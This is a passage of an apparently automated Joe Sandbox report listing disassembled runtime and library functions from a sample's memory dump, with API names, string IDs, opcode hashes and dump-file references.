                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                                                                                                                                                                                              • Instruction ID: e5029f0840efb3eb24315dd0d7240b4df612b954707d7c7d08c344a079ed6a5e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C81907290C60A86EB749F2A806417C37A0EB25BCCF544077FB8AC6295DF3BE865C715
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE504E50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                                                                                                                                                                                              • Instruction ID: 6d60d0e0cb4ab7464bf7ffacbfa073acc4e00c9f87a9b6128c6644d97dd7309e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B81537280C64A86EB748F26807417C3B95EB21B8CF140137FA4AC7296CE3BE5A5C751
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5063E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                                                                                                                                                                                              • Instruction ID: c8b9dd5b713cd8584ff65186a3c60622e5c9c115d482e76b7071587da3c6bfd2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1881B8B280860A85EB649F27806617C37A0EB21BDCF944037FA49C6A89CF7FE465C715
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE50551C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: $*
                                                                                                                                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                              • Opcode ID: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                                                                                                                                                                                              • Instruction ID: 613aea924605453fe47e3e37ec8b9d26cb15b036071d8f96323cb4a55c7bace9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB81517280C24AC6EB758E2A806417C3BA5FB25BCCF140137FA4A86295CE3BE465D711
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51F800 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: "$sinh
                                                                                                                                                                                                                              • API String ID: 1156100317-1232919748
                                                                                                                                                                                                                              • Opcode ID: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                                                                                                                                                                                              • Instruction ID: 9564e804206d156411ac7be851c4dec037652ef411520a355aab2864b48676f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C91A322D28F8988D6638B34A4613BA7358AF7A3D5F11C337F58E71A55DF2DA0638700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE50061C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                                                                                                                                                                                              • Instruction ID: 128262ee7167dd3a7b4377fd458f0cd6119397f296f58a42442fa5e2c89cc203
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75615732A08A49CAE720CF66D0403AD77A0FB94B9CF044626FE4D57B99CF79E165C740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4FEF34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                              • API String ID: 2208346422-629598281
                                                                                                                                                                                                                              • Opcode ID: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                                                                                                                                                                                              • Instruction ID: 5b1e65fb35209d4d9dea413e7fedf5bc45cd1199fc5d455d17cd156473b97809
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45518B32A196438BEB14CB15E844A2D37A5FF64F98F508132EE1A87788DF7DE961C704
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51F344 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: !$acos
                                                                                                                                                                                                                              • API String ID: 1156100317-2870037509
                                                                                                                                                                                                                              • Opcode ID: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                                                                              • Instruction ID: a1ffb1cdc566154981ea2b64b37101d3d4eafc690d473c45b8f970ba9895af42
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE61B425D18F4A89E623CF74542127AA754BFBA3D0F118333F95EB5964DF2DE0A39600
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51F0B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID: !$asin
                                                                                                                                                                                                                              • API String ID: 1156100317-2188059690
                                                                                                                                                                                                                              • Opcode ID: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                                                                              • Instruction ID: 4f82750c2e2a88dd8ac9350ef8c759d7c26986bdb0abaf42649cf86d6a8ea4d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE518B25D2CF4A85E613CF74986127EA354AFBB3D0F118337F95EB5964DF1EA0A28600
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE498C80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolock
                                                                                                                                                                                                                              • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                                                                                                                                                                                              • API String ID: 2882679554-1241789697
                                                                                                                                                                                                                              • Opcode ID: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                                                                              • Instruction ID: e1d61fd9f25cd7570f089d1c21b3dabf66a2bb2db1f4544ac20602b2fa973bb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C51EF7651CB4682EA609B19E95036EA7A1F7E87D4F100537FA8DD7BA9CF3CD4508B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5319F0 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 72036449-0
                                                                                                                                                                                                                              • Opcode ID: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                                                                              • Instruction ID: b1a0f4d4bb7065f303f38290326a7ae2b7885e9ec8057a45a15e77f05d075555
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C651C222E0C60A46F7794A38963537D6680DB627D4F198137FA0DC72D5EE2FE8708781
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4619C0 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3461063567-0
                                                                                                                                                                                                                              • Opcode ID: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                                                                              • Instruction ID: 27799c6f2a5c52805f3d04a61abbff8fc3380294bd258da4ee0e15cd0d7fa98a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B731F536A18BC586E7608B15E4943AEB3A1FBD9784F500037E68D83B68DF7DD068CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5308C0 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2321548817-0
                                                                                                                                                                                                                              • Opcode ID: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                                                                              • Instruction ID: 2efcb6f7195c0bce09c279971d55d5daed932f591d416a518c057424e214e9b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36117F62A0D78A82FA559F65952023D63A2AF65BE0F444332F92DC76C5DF2EE8618700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE504C2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
